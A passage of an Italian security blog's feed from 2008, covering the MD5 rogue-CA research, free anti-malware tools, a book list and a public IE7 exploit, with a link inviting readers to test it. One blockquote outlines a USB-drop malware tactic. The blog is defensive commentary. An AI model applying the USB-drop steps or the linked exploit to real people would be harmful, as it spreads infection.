&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/WyqzZbDa35A" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5892598875094725214?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5892598875094725214?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/WyqzZbDa35A/babbo-voglio-un-cluster-di-ps3.html" title="Babbo, voglio un cluster di PS3" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_-FDKJTRMHR0/SVp3xT6k1mI/AAAAAAAAABc/D8XaRy4eXo0/s72-c/ps3cluster2.jpg" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2008/12/babbo-voglio-un-cluster-di-ps3.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0EMRXc_cSp7ImA9WxVTFks.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-7869539879306111214</id><published>2008-12-30T07:12:00.001-08:00</published><updated>2008-12-30T10:28:04.949-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-30T10:28:04.949-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="certificati" /><category scheme="http://www.blogger.com/atom/ns#" term="md5" /><title>Rogue CA attraverso collisioni MD5</title><content type="html">Sarà una data che ricorderanno in molti, perché è stata data prova per la prima volta di un attacco pratico che sfrutti le collisioni dell'algoritmo di hashing più diffuso: MD5.&lt;br /&gt;&lt;br /&gt;Gli hash MD5 vengono utilizzati per la firma digitale di molti certificati di root pre installati nei browser. Questi certificati di root appartengono a delle Certification Authority note che a loro volta firmano i certificati dei vari siti web.&lt;br /&gt;&lt;br /&gt;Proprio nella mattinata di oggi è stata resa finalmente pubblica la ricerca di Alex Sotirov e altri, che dimostra la creazione di CA fasulle in grado di essere riconosciute come legittime da tutti i browser in circolazione (non è una vulnerabilità nei browser, stiamo attenti).&lt;br /&gt;&lt;br /&gt;Tale minaccia apre il fronte a nuovi attacchi di phishing. Una CA fasulla è in grado di firmare un certificato anch'esso fasullo ma riconosciuto come legittimo da qualsiasi browser.&lt;br /&gt;&lt;br /&gt;Una chicca resa nota da Sotirov in twitter è che per la generazione delle &lt;a href="http://en.wikipedia.org/wiki/Hash_collision"&gt;collisioni&lt;/a&gt; sono state utilizzate 100 Play station in parallelo (trovare due stringhe diverse che diano lo stesso hash è un'operazione molto esosa in termini di potenza di calcolo).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La ricerca completa è &lt;a href="http://www.win.tue.nl/hashclash/rogue-ca"&gt;qui&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;L'anno si chiude coi migliori auspici....Buon anno a tutti....&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-7869539879306111214?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PoMSy2xSJ0dzZL-bIcJE0QmOVe0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PoMSy2xSJ0dzZL-bIcJE0QmOVe0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PoMSy2xSJ0dzZL-bIcJE0QmOVe0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PoMSy2xSJ0dzZL-bIcJE0QmOVe0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=rKVvMDCq934:WnVxGJlQV9M:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=rKVvMDCq934:WnVxGJlQV9M:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=rKVvMDCq934:WnVxGJlQV9M:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/rKVvMDCq934" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7869539879306111214?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7869539879306111214?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/rKVvMDCq934/rouge-ca-collisioni-md5.html" title="Rogue CA attraverso collisioni MD5" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/rouge-ca-collisioni-md5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEMGQ3ozcSp7ImA9WxVTEUk.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-3184272015286733008</id><published>2008-12-23T15:40:00.000-08:00</published><updated>2008-12-24T10:13:42.489-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-24T10:13:42.489-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="protezione dati" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><category scheme="http://www.blogger.com/atom/ns#" term="spyware" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><category scheme="http://www.blogger.com/atom/ns#" term="adware" /><title>Proteggersi senza l'Antivirus</title><content type="html">Dopo aver sepolto l'Antivirus in uno dei precedenti &lt;a href="http://www.armandoromeo.com/2008/12/lantivirus-morto.html"&gt;post&lt;/a&gt;, mi sembra corretto ampliare il discorso introducendo alcune utility di facile utilizzo che se entrassero a far parte delle nostre abitudini quotidiane, limiterebbero al minimo l'esposizione del proprio computer a virus e malware.&lt;br /&gt;&lt;br /&gt;La prima utility è &lt;a href="http://www.sandboxie.com/"&gt;Sandboxie&lt;/a&gt; (gratuito). Già citata &lt;a href="http://www.armandoromeo.com/2008/12/come-volevasi-dimostrare.html"&gt;qui&lt;/a&gt;, ci permette di avviare qualsiasi eseguibile di origine sconosciuta o sospetta senza che questo possa effettivamente danneggiare il sistema.&lt;br /&gt;Sandboxie permette di lanciare applicazioni le cui modifiche al sistema rimarranno valide solo all'interno della sandbox che farà da strato aggiuntivo per il sistema operativo. Questo significa che l'applicazione funzionerà come se la sandbox non ci fosse, e il sistema operativo come se l'applicazione non fosse stata eseguitata.&lt;br /&gt;&lt;br /&gt;Da notare che un programma all'interno della sandbox non sarà in grado di apportare modifiche all'esterno. Questo significa che lanciando un browser in sandbox annulla completamente il rischio di essere infettati da malware, spyware e adware, in quanto al momento della distruzione della sandbox nulla sarà rimasto nel sistema operativo.&lt;br /&gt;Sandboxie è un programma &lt;span style="font-weight: bold;"&gt;gratuito &lt;/span&gt;altamente personalizzabile e con caratterisitiche davvero avanzate.&lt;br /&gt;&lt;br /&gt;Fate un favore alla vostra intelligenza. Invece di navigare 100 forum per capire qual'è il migliore antivirus, leggete le FAQ  di Sandboxie e iniziate ad usarlo.&lt;br /&gt;&lt;br /&gt;Uno dei motivi che mi spinse ad installare un Antivirus, fu la diffusione, qualche anno fa, delle pen drive. Una vera piaga. Utilissimi per carità, non se può fare a meno.  Ma sono stati una vera manna per i diffusori di malware.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Comprate 10-20 pen drive da 256Mb, (ormai c'è chi le regala...).&lt;br /&gt;Caricateci su un virus.&lt;br /&gt;Spargete queste pen drive in luoghi affollati.&lt;br /&gt;Qualcuno le troverà e le inserirà gioiosamente nel proprio laptop.&lt;br /&gt;Ed ecco fatto, risalire all'autore del virus è praticamente impossibile.&lt;/blockquote&gt;Tutti i principali malware moderni sono in grado di replicarsi su qualsiasi disco removibile&lt;br /&gt;connesso al computer e tramite questo su altri computer.&lt;br /&gt;&lt;br /&gt;Proprio per questo un utility come &lt;a href="http://net-studio.org/application/usb_firewall.php"&gt;USBFirewall &lt;/a&gt;(gratuito) è veramente un valido aiuto. Molto più utile di un antivirus perché blocca l'esecuzione di qualsiasi programma all'inserimento del disco nella porta USB.&lt;br /&gt;&lt;br /&gt;Molti dei virus in circolazione sfruttano exploit per vulnerabilità già note per cui è disponibile una patch. Un esempio è il &lt;a href="http://blogs.technet.com/feliciano_intini/archive/2008/11/26/segnalazioni-del-worm-win32-conficker-a-verificate-di-aver-installato-la-patch-ms08-067.aspx"&gt;Conficker &lt;/a&gt;worm che sfrutta la vulnerabilità&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx?info=EXLINK" class="l"&gt; MS08-067&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://secunia.com/vulnerability_scanning/personal/"&gt;Secunia PSI&lt;/a&gt; è a mio parere il &lt;span style="font-weight: bold;"&gt;miglior software per la sicurezza del 2008&lt;/span&gt;. Permette di tenere tutti i programmi installati nel PC aggiornati all'ultima patch in maniera semplice, non invasiva e anche gratuita.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Le utility sopracitate sono per la prevenzione delle infezioni. Utility indispensabili alla diagnosi sono invece &lt;a href="http://www.nirsoft.net/utils/cports.html"&gt;CurrPorts&lt;/a&gt; (gratuito), &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx"&gt;Autoruns&lt;/a&gt; (gratuito). La prima ci permette di verificare quali processi hanno connessioni aperte e qual'è l'indirizzo remoto.&lt;br /&gt;La seconda è la migliore utility per la gestione dei pricessi e servizi in esecuzione all'avvio di Windows.&lt;br /&gt;&lt;br /&gt;Per quanto riguarda la cura, a parte un &lt;a href="http://www.mcafeestore.com/dr/sat3/ec_MAIN.Entry11?sp=10007&amp;amp;PN=0&amp;amp;xid=45565&amp;amp;CUR=978&amp;amp;DSP=&amp;amp;PGRP=0&amp;amp;ABCODE=&amp;amp;CACHE_ID=364838"&gt;Antivirus&lt;/a&gt; (69 €), consiglio &lt;a href="http://www.gmer.net/index.php"&gt;Gmer&lt;/a&gt; (gratuito), uno dei migliori per il riconoscimento di rootkit e &lt;a href="http://www.safer-networking.org/it/index.html"&gt;SpyBot &lt;/a&gt;(gratuito) per la rimozione di spyware/adware.&lt;br /&gt;&lt;br /&gt;Io la mia parte l'ho fatta...&lt;br /&gt;&lt;br /&gt;Buon Natale a tutti...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://dilbert.com/strips/comic/2008-12-24/" title="Dilbert.com"&gt;&lt;img style="width: 489px; height: 152px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/30000/6000/500/36591/36591.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-3184272015286733008?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5e1htJtUfRu_vR7ulFVPnOWxd-o/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5e1htJtUfRu_vR7ulFVPnOWxd-o/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5e1htJtUfRu_vR7ulFVPnOWxd-o/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5e1htJtUfRu_vR7ulFVPnOWxd-o/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=3Gr5sivSx40:67mLe_ucOLk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=3Gr5sivSx40:67mLe_ucOLk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=3Gr5sivSx40:67mLe_ucOLk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/3Gr5sivSx40" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/3184272015286733008?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/3184272015286733008?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/3Gr5sivSx40/proteggersi-senza-lantivirus.html" title="Proteggersi senza l'Antivirus" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/proteggersi-senza-lantivirus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YFSX86cSp7ImA9WxRaEUs.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-1423261018802399545</id><published>2008-12-13T02:55:00.000-08:00</published><updated>2008-12-13T03:51:58.119-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-13T03:51:58.119-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="libri" /><category scheme="http://www.blogger.com/atom/ns#" term="sicurezza informatica" /><title>Consigli per gli acquisti</title><content type="html">Vacanze di Natale. Un po più di tempo per leggere. Se non volete regalarvi uno di &lt;a href="http://www.gifts.com/personality/the-geek/ohMr6aicp18s"&gt;questi&lt;/a&gt; o continuate a sognare &lt;a href="http://www.irextechnologies.com/products/iliad"&gt;questo &lt;/a&gt;potete continuare a leggere questo post.&lt;br /&gt;&lt;br /&gt;Questa è una reading list di libri di sicurezza informatica che ho trovato più interessante negli ultimi mesi.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;strong&gt;&lt;a href="http://www.amazon.com/Security-Risk-Assessment-Handbook-Assessments/dp/0849329981/ref=si3_rdr_bb_product"&gt;The Security Risk Assessment Handbook&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt; - Douglass Landoll&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://images.barnesandnoble.com/images/14810000/14817367.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 179px; height: 280px;" src="http://images.barnesandnoble.com/images/14810000/14817367.JPG" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Senza dubbio il miglior libro per chiunque si avvicini per la prima volta a questo argomento o per chi abbia bisogno di rivedere certe procedure. Un libro che ogni consulente o esperto dovrebbe leggere.  L'autore fornisce esempi pratici passo-passo oltre ad un ottima infarinatura di teoria.&lt;a href="http://www.armandoromeo.com/2008/10/rosi-quando-conviene-investire-in.html"&gt;&lt;br /&gt;Un approccio basato sulla priorità del rischio è fondamentale per indirizzare il budget di spesa nella giusta direzione&lt;/a&gt;. - &lt;a href="http://www.amazon.com/gp/sitbv3/reader?ie=UTF8&amp;amp;p=S00A&amp;amp;asin=0849329981"&gt;Table of content&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;strong&gt;&lt;a href="http://www.amazon.com/Security-Metrics-Replacing-Uncertainty-Doubt/dp/0321349989/ref=sr_1_1?ie=UTF8&amp;amp;s=books&amp;amp;qid=1229167518&amp;amp;sr=1-1"&gt;Security Metrics: Replacing Fear, Uncertainty, and Doubt&lt;/a&gt;&lt;/strong&gt; - &lt;/span&gt;&lt;span style="font-weight: normal;"&gt;Andrew Jaquith&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://ecx.images-amazon.com/images/I/51eOWkui6EL._SS500_.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 262px; height: 262px;" src="http://ecx.images-amazon.com/images/I/51eOWkui6EL._SS500_.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Dopo aver letto Risk Assessment Handbook, Security metrics è la giusta continuazione in un filo logico che parte dall'analisi del rischio alla distruzione dello stesso. Security Metrics tocca il nervo scoperto della sicurezza: l'assenza di metriche affidabili e universalmente accettate che quindi rende l'analisi del rischio un processo non più scientifico con risultati certi ma un processo fortemente soggettivo.&lt;br /&gt;L'autore propone approcci scientifici oggettivi alla misurazione dell'efficacia delle varie soluzioni di sicurezza.  Risk Assessment Handbook e Security Metrics sono i libri che più mi hanno arricchito dal punto di vista professionale.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;strong&gt;&lt;a style="font-weight: bold;" href="http://www.amazon.com/Professional-Pen-Testing-Applications-Programmer/dp/0471789666/ref=sr_1_1?ie=UTF8&amp;amp;s=books&amp;amp;qid=1229166757&amp;amp;sr=1-1"&gt;&lt;span id="btAsinTitle" style=""&gt;Professional Pen Testing for Web Applications&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="font-weight: normal;font-size:100%;" &gt;&lt;span id="btAsinTitle" style=""&gt; - Andres Andreu&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.amazon.com/Professional-Pen-Testing-Applications-Programmer/dp/0471789666/ref=sr_1_1?ie=UTF8&amp;amp;s=books&amp;amp;qid=1229166757&amp;amp;sr=1-1"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://ecx.images-amazon.com/images/I/41Y8XT76HZL._SL160_.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 127px; height: 160px;" src="http://ecx.images-amazon.com/images/I/41Y8XT76HZL._SL160_.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Andres è un amico da anni. Uno dei migliori penetration tester in circolazione. E ha scritto l'unico libro di penetration testing da professionista a professionista. Andres si sofferma sull'approccio scientifico da seguire piuttosto che sulle varie vulnerabilità delle web applications di cui, comunque, ne delinea le caratteristiche principali e come rilevarle.&lt;br /&gt;Fornisce utilissimi consigli su come organizzare e portare a termine in modo efficiente un penetration test attraverso esempi, tabelle e consigli frutto di una lunghissima esperienza nel settore. Un must have. (p.s. nel libro troverete anche una recensione di &lt;a href="http://www.hackerscenter.com/"&gt;Hackers Center&lt;/a&gt; di cui Andres è avido lettore)&lt;br /&gt;&lt;br /&gt;E ora la consueta striscia del sommo Dilbert...&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://dilbert.com/strips/comic/2008-11-21/" title="Dilbert.com"&gt;&lt;img style="width: 441px; height: 137px;" src="http://dilbert.com/dyn/str_strip/000000000/00000000/0000000/000000/30000/1000/900/31969/31969.strip.gif" alt="Dilbert.com" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-1423261018802399545?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BIU7IrpaUE3trLCogiPkcP4SwUI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BIU7IrpaUE3trLCogiPkcP4SwUI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BIU7IrpaUE3trLCogiPkcP4SwUI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BIU7IrpaUE3trLCogiPkcP4SwUI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=20qyt_8l3bg:SOtXtUXhDM4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=20qyt_8l3bg:SOtXtUXhDM4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=20qyt_8l3bg:SOtXtUXhDM4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/20qyt_8l3bg" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1423261018802399545?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/1423261018802399545?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/20qyt_8l3bg/libri-sicurezza-informatica.html" title="Consigli per gli acquisti" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2008/12/libri-sicurezza-informatica.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C04MSXs5fCp7ImA9WxRbGUg.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-8212576306943205485</id><published>2008-12-10T15:20:00.000-08:00</published><updated>2008-12-10T15:33:08.524-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2008-12-10T15:33:08.524-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="buffer overflow" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="0day" /><title>0day in Internet Explorer7 - Exploit pubblico</title><content type="html">Ora che l'exploit è stato &lt;a href="http://www.milw0rm.com/exploits/7403"&gt;pubblicato &lt;/a&gt;consiglierei davvero di non usare Internet Explorer 7 fino a patch rilasciata (che dovrebbe essere a breve).&lt;br /&gt;&lt;br /&gt;L'exploit funziona su &lt;span style="font-weight: bold;"&gt;Internet Explorer 7.0.5730.13&lt;/span&gt;, Windows XP SP3 e Windows 2003 con tutte le patch aggiornate. Si tratta per questo di uno 0day&lt;br /&gt;&lt;br /&gt;La semplice navigazione su un sito web non fidato può causare l'esecuzione di codice sulla macchina client che può portare alla sua completa compromissione.&lt;br /&gt;&lt;br /&gt;Il proof of concept mostra come sia possibile lanciare un eseguibile (calc.exe) semplicemente navigando un file html.&lt;br /&gt;&lt;br /&gt;Per chi ancora navighi con Internet Explorer, consiglio vivamente di provarlo &lt;a href="http://www.milw0rm.com/exploits/7403"&gt;qui&lt;/a&gt;. A volte un impatto emotivo è meglio di 100 consigli&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://dilbert.com/strips/comic/2008-12-09/" title="Dilbert.com"&gt;&lt;img style="width: 